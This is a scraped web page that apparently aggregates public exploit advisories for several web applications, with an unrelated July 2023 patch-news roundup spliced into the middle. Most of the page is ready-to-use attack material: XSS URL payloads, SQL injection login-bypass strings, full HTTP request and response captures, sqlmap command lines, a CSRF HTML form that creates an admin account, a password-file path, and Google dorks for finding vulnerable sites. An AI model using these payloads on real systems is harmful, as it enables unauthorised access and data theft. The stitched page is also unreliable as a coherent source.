CMSninesol version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMSninesol v1.0 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ninesol.com                                                                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/comwaveedupk/download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMSninesol 1.0 Cross Site Scripting

Wifi Soft Unibox Administration 3.0 and 3.1 is vulnerable to SQL Injection. The vulnerability occurs because of not validating or sanitizing the user input in the username field of the login page.

    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"# Date: 07/2023# Exploit Author: Ansh Jain @sudoark# Author  Contact : arkinux01@gmail.com# Vendor Homepage: https://www.wifi-soft.com/# Software Link:https://www.wifi-soft.com/products/unibox-hotspot-controller.php# Version: Unibox Administration 3.0 & 3.1# Tested on: Microsoft Windows 11# CVE : CVE-2023-34635# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable toSQL Injection, which can lead to unauthorised admin access for attackers.The vulnerability occurs because of not validating or sanitising the userinput in the username field of the login page and directly sending theinput to the backend server and database.## How to ReproduceStep 1 : Visit the login page and check the version, whether it is 3.0,3.1, or not.Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field andenter any random password.Step 3 : Fill in the captcha and hit login. After hitting login, you havebeen successfully logged in as an administrator and can see anyone's userdata, modify data, revoke access, etc.--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Request-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameters: username, password, captcha, action-----------------------------------------------------------------------------------------------------------------------POST /index.php HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 83Origin: https://255.255.255.255.host.comReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersusername='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 302 FoundServer: nginxDate: Tue, 18 Jul 2023 13:32:14 GMTContent-Type: text/html; charset=UTF-8Location: ./dashboard/dashboardExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Request--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------GET /dashboard/dashboard HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 200 OKServer: nginxDate: Tue, 18 Jul 2023 13:32:43 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheCache_control: private<!DOCTYPE html><html lang="en">html content</html>

CVE-2023-34635: Wifi Soft Unibox Administration 3.0

Plus: Mozilla fixes two high-severity bugs in Firefox, Citrix fixes a flaw that was used to attack a US-based critical infrastructure organization, and Oracle patches over 500 vulnerabilities.

CVE-2023-26083 is an issue in Arm Mali GPU driver for Bifrost, Avalon, and Valhall chips, rated as having a moderate impact. The vulnerability was used to deliver spyware to Samsung devices in December 2022.

CVE-2021-29256 is a high-severity flaw that also impacts Bifrost and Midgard Arm Mali GPU kernel drivers.

The Android updates have already reached Google’s Pixel devices and some of Samsung’s Galaxy range. Given the severity of this month’s bugs, it’s a good idea to check whether the update is available and install it now.

Google Chrome 115

Google has issued the Chrome 115 update for its popular browser, fixing 20 security vulnerabilities, four of which are rated as having a high impact. CVE-2023-3727 and CVE-2023-3728 are use-after-free bugs in WebRTC. The third flaw rated as having a high severity is CVE-2023-3730, a use-after-free vulnerability in Tab Groups, while CVE-2023-3732 is an out-of-bounds memory access bug in Mojo.

Six of the flaws are listed as having a medium severity, and none of the vulnerabilities are known to have been used in real-life attacks. Even so, Chrome is a highly targeted platform, so check your system for updates.

Firefox 115

Hot on the heels of Chrome 115, rival browser Mozilla has released Firefox 115, fixing several flaws it rates as having high severity. Among these are two use-after-free bugs tracked as CVE-2023-37201 and CVE-2023-37202.

The privacy-conscious browser maker also fixed two memory safety bugs tracked as CVE-2023-37212 and CVE-2023-37211. The memory safety flaws are present in Firefox 114, Firefox ESR 102.12, and Thunderbird 102.12, Mozilla said in an advisory, adding: “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort some of these could have been exploited to run arbitrary code.”

Citrix

Enterprise software giant Citrix has issued an update warning after fixing multiple flaws in its NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) tools, one of which has already been used in attacks.

Tracked as CVE-2023-3519, the already exploited flaw is an unauthenticated remote code execution vulnerability in NetScaler ADC and NetScaler Gateway that’s so severe it’s been given a CVSS score of 9.8. “Exploits of CVE-2023-3519 on unmitigated appliances have been observed,” Citrix said. “Cloud Software Group strongly urges affected customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions as soon as possible.”

The flaw was also the subject of an advisory from the US Cybersecurity and Infrastructure Security Agency (CISA), which warned that the bug was used in attacks on a critical infrastructure organization in June.

SAP

SAP, another enterprise software firm, has issued its July Security Patch Day, including 16 security fixes. The most severe flaw is CVE-2023-36922, an OS command injection vulnerability with a CVSS score of 9.1.

The bug allows an authenticated attacker to “inject an arbitrary operating system command into a vulnerable transaction and program,” security firm Onapsis said. “Patching is strongly recommended, since a successful exploit of this vulnerability has a high impact on confidentiality, integrity, and availability of the affected SAP system,” it warned.

Meanwhile, CVE-2023-33989 is a directory traversal vulnerability in SAP NetWeaver with a CVSS score of 8.7, and CVE-2023-33987 is a request smuggling and request concatenation vulnerability in SAP Web Dispatcher with a CVSS score of 8.6.

Oracle

Software company Oracle has released its July Critical Patch Update Advisory, fixing 508 vulnerabilities in its products. Among the fixes are 77 new security patches for Oracle Communications. Oracle warned that 57 of these vulnerabilities could be remotely exploited over a network without user credentials. One of the worst flaws is CVE-2023-20862, which has been given a CVSS score of 9.8.

Meanwhile, 147 of the Oracle patches were for Financial Services, and Fusion Middleware received 60 fixes.

Oracle said it continues to receive reports of attempts to exploit vulnerabilities it has already patched. In some cases, attackers were successful because targeted customers had failed to apply available Oracle patches, it said. “Oracle, therefore, strongly recommends that customers remain on actively supported versions and apply Critical Patch Update security patches without delay.”

Apple iOS, Google Android Patch Zero-Days in July Security Updates

A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.

操作步骤：  
http://ip:port/mcms/search.do  
POST /mcms/search.do HTTP/1.1  
Host: ip:port  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0  
Content-Length: 59  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.7  
Content-Type: application/x-www-form-urlencoded  
Cookie: SHRIOSESSIONID-GOV=4b791a23-fd28-468c-8f24-9d303aebc88f  
Origin: http://ip:port  
Referer: http://ip:port/  
Upgrade-Insecure-Requests: 1  
Accept-Encoding: gzip

content\_title=1&style=%3CScRiPt%3Ealert(123)%3C%2FScRiPt%3E

CVE-2023-3990: 政务版存在xss跨站脚本攻击 · Issue #I7K4DQ · 铭飞/MCMS - Gitee.com

XLAgenda version 4.4 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : XLAgenda v4.4 CSRF Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://xavier.lequere.net/xlagenda/                                                                               |  | # Dork      : "Propulsé par XLAgenda 4.4"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin.[+] Go to the line 12.[+] Set the target site link Save changes and apply. [+] infected file : /install/install2.php.[+] http://127.0.0.1/xlagenda44/install/install2.php[+] save code as poc.html .<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>XLAgenda 4.4 | Installation</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><link href="style.css" rel="stylesheet" type="text/css" /></head><body><h1>Installation - Etape 2/3</h1><p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p><form name="form1" method="post" action="http://127.0.0.1/xlagenda44/install/install2.php">  <h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3>  <p>    <label for="user">Nom d'utilisateur :</label><br>    <input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br>    (20 caractères maximum)  </p>  <p>    <label for="pass">Mot de passe :</label><br>    <input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br>    (6 à 15 caractères)  </p>  <p>    <label for="pass2">Introduisez à nouveau le mot de passe :</label><br>    <input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> *  </p>  <p>    <label for="nom">Nom :</label><br>    <input name="nom" type="text" id="nom" value="" size="30" />  </p>  <p>    <label for="prenom">Prénom :</label><br>     <input name="prenom" type="text" id="prenom" value="" size="30" />  </p>  <p>    <label for="email">Adresse email :</label><br>    <input name="email" type="text" id="email" value="" size="30" /> *  </p>  <p>    Les champs marqués d'un * sont obligatoires.<br>    Votre adresse email n'appara&icirc;tra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié.  </p>  <p style="text-align:center;">   <input type="submit" name="Submit" value="Continuer >>" />  </p></form></body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

XLAgenda 4.4 Cross Site Request Forgery

WonderCMS version 0.6-Beta suffers from a password disclosure vulnerability.

    ====================================================================================================================================| # Title     : WonderCMS v0.6-Beta Password Disclosure Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://wondercms.com/                                                                                              || # Dork      : ©2015 Your website | Powered by WonderCMS | Login                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] /files/password[+] http://127.0.0.1/wondercms/files/passwordGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WonderCMS 0.6-Beta Password Disclosure

B-OBEC version V.092019 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : B-OBEC V.092019 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://bobec.bopp-obec.info/                                                                                      |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /area_user.php?Area_CODE=1001[+] D:\sqlmap>sqlmap.py -u https://target_site/area_user.php?Area_CODE=1001 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbsGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

B-OBEC V.092019 SQL Injection

BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BMIT BMS 2.1 Auth BY Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.bmitsolution.in/softtware_development.php                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ADMIN' OR 1=1#[+] http://127.0.0.1/wwrbsgroupofinstitutioncom/admin/index.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

BMIT BMS 2.1 SQL Injection

AMSS++ version 5.21.09 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMSS++ V5.21.09 JT SQL injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_full_update_5_21.rar                                         |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules/mail/main/maildetail.php?id=174 <===== inject here D:\sqlmap>sqlmap.py -u https://127.0.0.1/amss.ictkan2com/modules/mail/main/maildetail.php?id=174 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D admin_amssGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMSS++ 5.21.09 SQL Injection

AMS Logistics version 2.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMS LOGISTICS 2.2 SQL injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.amslogistics.co.th/#software                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /ai_news_read.php?l_id=AMS23050001 <===== inject here [+] https://127.0.0.1/wtheailogisticscom/ai_news_read.php?l_id=AMS23050001Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#firefox